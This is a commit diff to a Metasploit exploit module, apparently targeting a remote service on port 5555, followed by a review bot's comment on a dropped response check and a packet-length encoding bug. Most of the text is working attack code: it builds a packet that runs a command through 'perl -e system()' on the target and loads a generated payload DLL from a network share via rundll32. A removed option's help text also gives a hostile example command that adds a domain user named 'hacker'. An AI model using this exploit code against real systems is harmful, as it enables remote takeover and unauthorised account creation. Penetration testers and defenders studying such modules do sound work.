Delete CMD option
This commit is contained in:
parent
d4337ce1ae
commit
e04ff3ee24
@ -45,7 +45,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(5555),
|
||||
OptString.new('CMD',[false, 'The command to run e.g. net user hacker hacker123 /add /domain']),
|
||||
OptString.new('FILE_NAME', [ false, 'DLL File name to share', 'exploit.dll'])
|
||||
], self.class)
|
||||
|
||||
@ -92,11 +91,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def exec_bar(cmd)
|
||||
connect
|
||||
cmd = cmd.gsub("\\", "\\\\\\\\")
|
||||
vprint_status("Sending Command: #{cmd}")
|
||||
cmd.gsub!("\\", "\\\\\\\\")
|
||||
|
||||
cmd_no = target['Offset'] + cmd.length
|
||||
vprint_status("Size is #{cmd_no}")
|
||||
|
||||
pkt = "\x00\x00\x00"
|
||||
pkt << cmd_no
|
||||
pkt << "\x32\x00\x01\x01\x01\x01\x01\x01\x00\x01\x00\x01"
|
||||
@ -104,40 +102,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
pkt << "\x65\x72\x6c\x2e\x65\x78\x65\x00\x20\x2d\x65\x73\x79\x73\x74\x65\x6d" # perl -e system('cmd')
|
||||
pkt << "('#{cmd}')" # Executable
|
||||
pkt << "\x00"
|
||||
sock.put(pkt)
|
||||
# In my testing the default timeout (10) isn't enough
|
||||
if datastore['CMD']
|
||||
begin
|
||||
res = sock.get_once(-1, 20)
|
||||
rescue EOFError # happens when using the Powershell method
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
fail_with(Failure::Unknown, "#{peer} - Expected answer not received... aborting...") unless exec_bar?(res)
|
||||
disconnect
|
||||
else
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
|
||||
def exec_bar?(data)
|
||||
return false if data.blank?
|
||||
data_unpacked = data.unpack("NnVv")
|
||||
data_unpacked.length == 4 && data_unpacked[0] == 16 && data_unpacked[1] == 0xfffe && data_unpacked[2] == 0x39 && data_unpacked[3] == 0x20
|
||||
connect
|
||||
sock.put(pkt)
|
||||
disconnect
|
||||
end
|
||||
|
||||
def primer
|
||||
if datastore['CMD']
|
||||
print_status("Executing command #{datastore['CMD']}")
|
||||
exec_bar(datastore['CMD'])
|
||||
else
|
||||
self.file_contents = generate_payload_dll
|
||||
print_status("File available on #{unc}...")
|
||||
print_status("Sending load DLL to #{datastore['RHOST']}:#{datastore['RPORT']} - #{unc}")
|
||||
sploit = "rundll32.exe #{unc},"
|
||||
sploit << rand_text_numeric(1)
|
||||
exec_bar(sploit)
|
||||
end
|
||||
self.file_contents = generate_payload_dll
|
||||
print_status("File available on #{unc}...")
|
||||
|
||||
print_status("#{peer} - Trying to execute remote DLL...")
|
||||
sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
|
||||
exec_bar(sploit)
|
||||
end
|
||||
end
|
||||
|
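Review bot: With the CMD branch gone, `exec_bar` now does `sock.put(pkt)` and `disconnect` without reading anything back, so `exec_bar?(data)` appears to have no remaining caller and the module no longer checks whether the service accepted the request; either remove the helper or keep a bounded `res = sock.get_once(-1, 20)` and `fail_with(...) unless exec_bar?(res)` before `disconnect`. The length field is still written as `pkt << cmd_no` on a String literal, which appends a codepoint rather than a byte — for `target['Offset'] + cmd.length` above 127 this yields two bytes in a UTF-8 source string (or raises RangeError above 255 in a binary one); `pkt << [cmd_no].pack('C')` guarded by a `cmd_no <= 255` check would make the single-byte field explicit. This rendering does not preserve which lines sit on the old or new side, so the first point should be confirmed against the patched file.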